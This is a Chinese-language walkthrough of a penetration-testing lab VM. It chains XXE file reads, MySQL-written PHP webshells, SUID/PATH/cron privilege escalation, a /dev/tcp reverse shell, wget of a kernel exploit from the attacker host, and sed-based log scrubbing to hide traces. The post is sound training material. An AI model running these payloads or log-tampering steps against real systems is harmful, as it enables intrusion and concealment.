1. 项目概述一次结合XXE漏洞的实战渗透演练最近在整理自己的渗透测试学习笔记时翻到了一个挺有意思的入门级靶机渗透题目。这个题目的核心不在于它有多复杂而在于它将一个经典的Web漏洞——XXEXML External EntityXML外部实体注入与常规的主机渗透流程巧妙地结合在了一起。对于刚入门网络安全、正在学习渗透测试的朋友来说这种“组合拳”式的题目非常有价值它能帮你把零散的知识点串联起来形成一个完整的攻击链思维。很多新手朋友可能对Nmap扫描、Web目录爆破、文件上传拿Shell这些步骤都单独练过但面对一个综合性的目标时常常会感到无从下手或者拿到一个Webshell后就不知道下一步该干什么了。这个靶机正好提供了一个从外网信息收集开始到最终获取系统最高权限的完整闭环练习场景。题目提供了一个靶机环境附件这意味着你可以在本地虚拟机如VMware或VirtualBox中安全、合法地搭建起一个模拟的“受害主机”进行反复的攻防演练而无需担心法律风险。整个渗透过程会涉及到信息收集、端口与服务探测、Web应用漏洞发现与利用重点是XXE、权限提升等多个阶段。通过亲手走一遍这个流程你不仅能加深对XXE漏洞原理和利用手法的理解更能体会到在真实渗透测试中如何将一个Web漏洞作为突破口逐步向内网和系统纵深推进。下面我就结合这个靶机把完整的渗透思路、操作步骤以及我踩过的坑和总结的技巧毫无保留地分享给大家。2. 靶机环境搭建与初始信息收集2.1 靶机环境配置与网络设置拿到靶机附件通常是一个.ova或.vmdk虚拟机文件后第一步是将其导入到你的虚拟化软件中。我使用的是VMware Workstation。导入过程很简单基本就是“文件”-“打开”然后选择下载好的虚拟机文件。这里有一个关键注意事项务必将靶机的网络适配器模式设置为“NAT”或“仅主机模式”。我强烈推荐使用“仅主机模式”因为这样能创建一个封闭的、仅存在于你物理机和靶机之间的虚拟网络完全与你的真实家庭或公司网络隔离避免了任何意外的网络扫描影响到其他设备安全性最高。启动靶机后我们首先需要知道它的IP地址。但靶机通常不会在界面上直接显示IP。这时我们需要在自己的攻击机通常是Kali Linux上进行网络发现。假设你的攻击机Kali也设置在“仅主机模式”下它们会处于同一个虚拟网段。打开Kali终端使用ifconfig或ip addr命令查看Kali在仅主机网络下的IP通常是192.168.xx.1或192.168.xx.100这样的地址。我们的目标就是找出同一网段下的其他存活主机也就是靶机。2.2 高效的主机发现与端口扫描策略最经典的工具非Nmap莫属。我们不建议一开始就对整个C段进行全端口扫描那样既慢又可能产生大量噪音。一个更高效的分层策略是这样的存活主机发现首先使用Ping扫描快速定位靶机IP。nmap -sn 192.168.xx.0/24这个命令-sn表示不扫描端口只检查主机是否在线会快速列出网段内所有存活的主机。从结果中排除掉你已知的Kali本机IP和网关IP剩下的那个大概率就是靶机了。假设我们发现的靶机IP是192.168.56.105。全面端口与服务探测找到IP后接下来进行详细的端口扫描这是信息收集的基石。nmap -sV -sC -p- -T4 192.168.56.105 -oA target_scan让我解释一下这个命令里每个参数的意义理解了才能举一反三-sV探测端口上运行的服务及其版本号。知道服务版本是后续搜索漏洞利用的关键。-sC使用Nmap自带的默认脚本进行扫描这些脚本能进行更深入的探测比如识别HTTP服务的标题、robots.txt或者发现一些简单漏洞。-p-扫描所有65535个端口。这是新手容易忽略的一点很多CTF或渗透靶机会把Web服务开在8080、8443甚至更奇怪的端口上只扫描默认的1000个常用端口Nmap默认行为会让你错过重要入口。-T4设置扫描速度为第4级共0-5级在保持相对准确性的前提下加快速度。对于本地靶场用-T4或-T5都没问题。-oA target_scan将扫描结果以三种格式普通、XML、Grepable同时输出到文件方便后续查阅和分析。扫描完成后仔细分析输出报告。对于这个靶机我们可能会看到类似这样的结果PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.9p1 (protocol 2.0) 80/tcp open http Apache httpd 2.4.41 3306/tcp open mysql MySQL 5.7.32这告诉我们靶机开放了SSH22、HTTP80和MySQL3306服务。Web服务80端口通常是我们首要的突破口。2.3 Web应用初步侦察与目录枚举确定了80端口有HTTP服务后下一步就是访问这个网站看看它是什么。直接在浏览器输入http://192.168.56.105。打开后可能是一个简单的企业门户、一个博客或者就是一个登录页面。用浏览器的“查看页面源代码”功能快速过一遍有时注释里会隐藏开发人员留下的测试账号密码、目录路径等敏感信息。紧接着必须进行目录和文件枚举。手动点击链接发现的内容是有限的我们需要用工具暴力猜解可能存在但未链接的目录和文件。这里我推荐使用gobuster或dirsearch。使用gobuster的例子gobuster dir -u http://192.168.56.105 -w /usr/share/wordlists/dirb/common.txt -x php,txt,html,bakdir指定模式为目录扫描。-u指定目标URL。-w指定字典文件。common.txt是一个常用的基础字典。在实战中你可能需要根据目标情况使用更大、更专业的字典。-x指定尝试的文件扩展名。这里我们猜测网站可能由PHP开发并寻找备份文件.bak和文本文件.txt。扫描结果可能会发现一些有趣的路径比如/admin、/upload、/backup、/index.php.bak、/robots.txt等。robots.txt文件尤其要关注它可能直接暴露管理员后台路径或禁止爬取的敏感目录。3. XXE漏洞的深度解析与利用实战3.1 XXE漏洞原理与常见触发点在目录枚举过程中我们可能会发现一个类似/api、/export、/upload的端点或者网站上存在一个“数据导入”、“文件上传”、“订阅反馈”等功能这些往往是XXE漏洞的高发区。XXE漏洞的本质是应用程序在解析用户输入的XML数据时未经充分安全处理就加载了外部实体。什么是“外部实体”你可以把它理解为XML文档中的一个变量但这个变量的值可以从本地文件系统或远程网络中加载。攻击者通过构造恶意的XML payload让服务器解析它从而可能实现读取服务器上的任意文件、发起内部网络请求SSRF甚至在某些条件下执行远程代码。一个最简单的存在XXE漏洞的请求可能长这样比如一个更新用户信息的APIPOST /update_profile HTTP/1.1 Content-Type: application/xml ?xml version1.0? !DOCTYPE foo [ !ENTITY xxe SYSTEM file:///etc/passwd ] usernamexxe;/name/user如果服务器将xxe;这个实体替换为file:///etc/passwd文件的内容并在响应中返回那么我们就成功读取了系统的/etc/passwd文件。这就是最基本的文件读取利用。3.2 手工探测与验证XXE漏洞在实际测试中我们如何发现XXE呢首先要寻找任何接受XML格式输入的地方。除了明显的XML接口还要注意文件上传功能允许上传XML、SVG、DOCX、PPTX、PDF等格式这些文件内部可能包含XML结构。内容类型转换比如“将数据导出为Word/Excel”功能后端可能将数据转为OOXML格式本质是ZIP包里的XML。单点登录SSO中的SAMLSAML协议大量使用XML历史上出现过不少XXE案例。发现可疑端点后我们可以用Burp Suite这样的工具进行拦截和测试。假设我们发现一个/data_import的POST请求其请求体是XML格式。我们可以先尝试一个经典的探测Payload看看服务器是否解析外部实体?xml version1.0? !DOCTYPE test [ !ENTITY % remote SYSTEM http://你的攻击机IP/test.dtd %remote; ] roottest/root同时在你的攻击机Kali上用Python快速开启一个HTTP服务并观察是否有请求到来python3 -m http.server 80如果服务器向你的80端口发起了请求说明它确实解析并尝试加载了外部DTDXXE漏洞存在这是一种“带外”Out-of-Band, OOB探测技术在那些不直接回显文件内容的“盲XXE”场景下特别有用。3.3 利用XXE进行关键信息读取确认漏洞存在后我们就可以进行利用。在这个靶机场景中第一步通常是读取系统文件为后续渗透铺路。我们需要读取哪些关键文件呢Web应用配置文件这是重中之重。在Linux系统上Web应用的配置文件路径取决于其框架。PHP项目/var/www/html/config.php/var/www/html/config.inc.php/var/www/html/configuration.php(Joomla)/var/www/html/wp-config.php(WordPress)。Java项目WEB-INF/web.xml/WEB-INF/classes/application.properties。通用.env文件常包含数据库密码、API密钥。 读取这些文件目标是找到数据库连接凭证。Payload示例!DOCTYPE foo [!ENTITY xxe SYSTEM file:///var/www/html/config.php] dataxxe;/data系统用户信息/etc/passwd文件可以让我们了解系统上有哪些用户。有时还能看到用户的home目录为后续可能的SSH密钥登录提供线索。!DOCTYPE foo [!ENTITY xxe SYSTEM file:///etc/passwd] dataxxe;/data敏感日志或源代码有时可以尝试读取Web服务器的访问日志如/var/log/apache2/access.log或者应用的源代码文件从中寻找硬编码的密码、逻辑漏洞等。实操心得在利用file://协议读取文件时经常会遇到服务器返回“非法字符”或解析错误。这通常是因为目标文件内容中包含XML特殊字符如,等破坏了响应XML的结构。解决方法是尝试使用PHP包装器如果服务器是PHP来对内容进行Base64编码后再读取!DOCTYPE foo [!ENTITY xxe SYSTEM php://filter/convert.base64-encode/resource/var/www/html/config.php] dataxxe;/data这样响应中返回的就是Base64编码后的文件内容解码即可得到原始文件完美避免了特殊字符问题。4. 从XXE到Webshell建立持久化访问通道4.1 利用获取的数据库凭证深入渗透通过XXE漏洞我们大概率已经读到了Web应用的数据库配置文件里面包含了数据库的地址通常是localhost或127.0.0.1、端口3306、数据库名、用户名和密码。这是我们渗透过程中的一个重大突破点。拿到数据库密码后我们首先尝试从外部连接MySQL。在Kali上使用mysql客户端mysql -h 192.168.56.105 -u 获取到的用户名 -p输入密码后如果连接成功我们就获得了数据库的访问权限。在数据库里我们能做很多事情信息收集查看所有数据库show databases;、查看表结构特别是寻找存储用户信息的表如users,admin,members。尝试查询管理员账号和密码哈希值。use 目标数据库名; show tables; select * from users;寻找写文件权限这是最关键的一步我们需要确认当前数据库用户是否有FILE权限这决定了我们能否通过数据库向服务器写入文件比如一个Webshell。执行以下SQL查询select file_priv from mysql.user where user当前用户名;如果返回Y则说明有权限。更直接的方法是尝试写入一个测试文件select ?php phpinfo();? into outfile /var/www/html/test.php;注意写入路径必须是Web服务器有权限写入、且能通过URL访问的目录。/var/www/html/是Apache/Nginx默认的Web根目录是首选。如果写入失败可能是目录权限问题可以尝试/tmp目录但/tmp下的文件通常无法通过Web访问。4.2 写入Webshell的多种姿势与技巧如果into outfile语句执行成功我们就成功在服务器上写入了一个一句话木马Webshell。访问http://192.168.56.105/test.php如果能看到PHP信息页面说明Webshell生效。但是实战中into outfile可能会因为各种原因失败权限、安全设置secure_file_priv等。这里分享几个备用方案和技巧利用日志文件写入如果MySQL的通用查询日志或慢查询日志是开启的并且日志文件被设置在Web目录下我们可以通过修改日志路径和日志内容来植入Webshell。set global general_log_file /var/www/html/shell.php; set global general_log on; select ?php system($_GET[\cmd\]);?; set global general_log off;这个技巧比较隐蔽但前提是当前用户有SUPER权限。利用联合查询UNION SELECT写入如果目标SQL存在注入点且是联合查询注入我们可以直接通过注入点写入Webshell这通常比用数据库客户端连接更直接。union select 1?php eval($_POST[a]);? into outfile /var/www/html/shell.php-- -Webshell的选择不要只用简单的phpinfo()或system()。推荐使用功能更全面的一句话木马例如包含文件管理、命令执行、数据库操作等功能的微型后门。也可以使用weevely、c99shell等经典工具生成加密的Webshell以绕过简单的WAF或杀毒软件检测。注意事项写入Webshell后立即尝试访问并测试功能。使用中国菜刀、蚁剑、Cobalt Strike的Beacon等工具进行连接。连接成功后第一件事往往不是乱跑而是尝试获取一个反向Shell将Web的交互模式转换为一个更稳定的命令行会话。5. 权限提升从Web权限到Root权限5.1 立足点加固与信息收集通过Webshell我们通常是以Web服务器进程的用户身份运行命令在Linux上常见的是www-data、apache或nginx。这个用户权限很低。权限提升Privilege Escalation简称提权的目标就是获取root权限。在开始盲目尝试各种提权漏洞之前系统性的信息收集至关重要。在你的反向Shell或Webshell中执行以下命令来绘制一张“系统地图”当前用户和组id whoami groups系统内核与发行版信息uname -a cat /etc/os-release lsb_release -a这些信息用于搜索针对特定内核版本或发行版的本地提权Local Privilege Escalation LPE漏洞。运行的服务与进程ps aux systemctl list-units --typeservice查看是否有以root身份运行的非关键服务这可能成为突破口。网络连接与监听端口netstat -tulnp ss -tulnp查看内部开放了哪些外部扫描不到的端口如127.0.0.1:xxxx可能存在内部服务。SUID/GUID特殊权限文件find / -perm -us -type f 2/dev/null find / -perm -gs -type f 2/dev/nullSUID文件在执行时会以文件所有者的权限运行。如果find、vim、bash、cp、nmap等命令被设置了SUID位且属于root就可能被利用来提权。可写的敏感文件与目录find / -writable -type d 2/dev/null | grep -v /proc/ find / -perm -ow -type f 2/dev/null | grep -v /proc/检查全局可写的目录和文件特别是/etc/passwd、/etc/sudoers、/etc/crontab等。定时任务Cron Jobscrontab -l ls -la /etc/cron* cat /etc/crontab查看是否有任何定时任务是以root身份运行的并且其脚本或路径我们可写这可以通过“Cron通配符注入”或“脚本覆盖”来提权。用户历史与配置文件cat ~/.bash_history cat ~/.ssh/* env历史命令可能泄露密码、路径等信息。.ssh目录下可能有私钥。环境变量可能包含敏感信息。5.2 常见Linux提权路径实战分析根据上面收集的信息我们可以选择不同的提权路径。以下是一些在这个靶机或类似场景中可能遇到的经典提权方法路径一利用SUID二进制文件假设我们发现/usr/bin/find具有SUID权限。我们可以利用find命令的-exec参数来执行命令。/usr/bin/find . -exec /bin/bash -p \;这里的-p参数是为了让bash保留SUID赋予的高权限。执行后我们可能直接获得一个root shell。其他常见的可滥用SUID程序还有nmap旧版本的交互模式、vim、less、more等。路径二利用环境变量劫持PATH如果我们发现一个以root权限运行的脚本或SUID程序它调用了系统命令如lscat但没有使用绝对路径我们就可以通过操纵PATH环境变量来进行劫持。在可写目录如/tmp下创建一个名为ls的恶意脚本echo /bin/bash -p /tmp/ls chmod x /tmp/ls将/tmp添加到PATH环境变量的最前面export PATH/tmp:$PATH然后运行那个SUID程序或root cron脚本当它调用ls时实际执行的是我们创建的/tmp/ls从而获得root shell。路径三利用定时任务Cron如果发现一个root用户的cron任务它执行一个我们拥有写权限的脚本文件那么直接修改这个脚本加入反弹shell的命令即可。echo bash -i /dev/tcp/攻击机IP/端口 01 /可疑的cron脚本.sh然后在攻击机上监听对应端口等待cron执行。路径四内核漏洞提权这是最“暴力”但往往最有效的方法。使用工具如linux-exploit-suggester或手动搜索根据uname -a输出的内核版本寻找公开的提权漏洞如DirtyCow CVE-2021-4034等。找到对应的漏洞利用代码Exploit在靶机上下载、编译、执行。# 在攻击机上准备exp gcc exploit.c -o exploit # 通过webshell上传到靶机 python3 -m http.server 80 # 在靶机上下载并执行 wget http://攻击机IP/exploit chmod x exploit ./exploit重要警告内核漏洞利用有风险可能导致系统崩溃Panic。在真实生产环境中务必谨慎在靶场中可以大胆尝试。路径五数据库用户提权如果我们通过XXE拿到了数据库root密码而不仅仅是应用数据库密码并且MySQL以root身份运行那么我们可以尝试从数据库层面提权。在MySQL中可以执行系统命令的插件如lib_mysqludf_sys或者通过写文件到/etc/cron.d、/var/spool/cron/crontabs/root等目录来安排定时任务。不过现代MySQL默认安装下这些方法限制较多。6. 渗透后清理与痕迹管理在成功获取root权限并完成所有预定目标比如找到flag文件后一个负责任的渗透测试者或学习者还需要考虑清理痕迹。虽然靶场环境无所谓但养成这个习惯对未来的实战至关重要。清除命令历史立即清除当前shell的历史记录并设置当前会话不记录历史。history -c unset HISTFILE export HISTFILE/dev/null删除上传的工具和Webshell删除通过文件上传或wget下载的所有渗透工具、脚本和Webshell文件。rm -f /var/www/html/shell.php /tmp/exploit /tmp/ls清除日志谨慎地清除相关的系统日志和Web日志。注意直接删除整个日志文件行为非常可疑。更隐蔽的做法是使用sed等工具删除包含你IP地址的特定行。# 不推荐直接rm # rm /var/log/auth.log /var/log/apache2/access.log # 更隐蔽的做法示例需根据实际情况调整 sed -i /你的攻击机IP/d /var/log/apache2/access.log对于wtmpbtmplastlog等二进制登录日志有专门的工具如utmpdump可以编辑但操作复杂且风险高。在靶场练习中了解这些位置即可。恢复被修改的配置如果你修改了/etc/passwd、/etc/sudoers或任何系统配置文件在离开前应尽量恢复原状。完成这一切后就可以退出会话了。整个渗透过程从外网扫描发现XXE漏洞到利用漏洞读取敏感信息进入数据库再到写入Webshell获取初始立足点最后通过系统信息收集和漏洞利用完成权限提升形成了一个完整的闭环。这个靶机题目很好地模拟了一个由浅入深的渗透场景对于理解攻击链和培养系统性思维大有裨益。我个人的体会是渗透测试就像解一道复杂的谜题耐心、细致和系统化的方法远比会使用几个自动化工具更重要。每一次信息收集的收获都可能为下一步打开一扇新的大门。